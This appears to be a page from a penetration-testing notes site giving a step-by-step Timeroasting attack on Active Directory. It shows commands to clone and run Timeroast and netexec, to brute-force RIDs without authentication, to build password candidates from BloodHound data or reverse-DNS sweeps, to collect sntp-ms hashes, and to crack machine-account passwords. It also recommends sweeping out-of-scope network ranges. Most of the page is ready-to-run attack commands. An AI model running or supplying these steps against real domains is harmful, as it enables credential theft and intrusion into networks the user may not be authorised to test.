Timeroasting

Some computer accounts can be configured with legacy passwords that are the first 14 characters (lowercase) of their username (minus the $). You can attack this in one of three ways:

  1. Password spraying

  2. Kerberoasting

  3. Timeroasting (preferred)

Timeroasting abuses the Window NTP protocol (sntp-ms), which extends the NTP protocol by adding a Message Authentication Code (MAC). This attack requests NTP syncs for a given RID and get's a hash back that can be cracked to the machine account password.

If you are not authenticated, you will not know the RIDs... but you can just bruit force the RIDs. You will then need to map the RIDs to hostnames, but you can also just attempt every hostname against every RID's sntp-ms hash.

The Timeroasting method is preferred since it's less noisy, not going to lockout accounts, and does not require AD authentication. Therefore, this write up will only cover attacking this via Timeroasting.

Download tooling

git clone https://github.com/SecuraBV/Timeroast.git
cd Timeroast

Get list of Timeroasting password candidates

Authenticated (Perfered)

jq '.data[] | .Properties.samaccountname' *computers.json | tr -d '"$' | tee timeroasting-hostnames.txt

Note that the above is parsed out of the Bloodhound.zip data

Unauthenticated

Get list of hostnames - Reverse DNS

dnsrecon -r <CIDR_RANGE> | tee reverse-dns_<CIDR_RANGE>.txt # Repeat for each active CIRD (including out-of-scope ranges)

# Create Timeroasting password candidates file
cat *.txt | grep 'PTR' | awk -F' ' '{print $3}' | sort -u | cut -d '.' -f 1 | tr '[:upper:]' '[:lower:]' | sort -u | cut -c1-14 >> timeroasting-hostnames.txt

You will have to do some manual parsing of the Timeroasting password candidates file since there could be some default PTR addresses that are not actually hostnames. If you don't, the cracking could be quite a bit slower but it should still be doable

Note that I you can run dnsrecon even against out-of-scope ranges since they may still have in-scope AD accounts. In my experience, you can even run it against /16 networks and it only takes a few minutes.

Collect Timeroasting hashes

Timeroast via RID Bruit Force - Netexec (Preferred)

# Using NXC version >= 1.4
nxc smb $ADCONTROLLER -M timeroast --log nxc-timeroast.txt
grep -a 'TIMEROAST' nxc-timeroast.txt | grep -v '[*]' | awk -F' ' '{print $12}' > timeroast.hashes

Timeroast via RID Bruit Force - timeroast.py

python3 timeroast.py $ADCONTROLLER -o timeroast.hashes

Crack Timeroasting hashes

wget https://raw.githubusercontent.com/SecuraBV/Timeroast/refs/heads/main/extra-scripts/timecrack.py
python3 timecrack.py timeroast.hashes timeroasting-hostnames.txt
PreviousKerberoastingNextAs-Rep Roasting

Last updated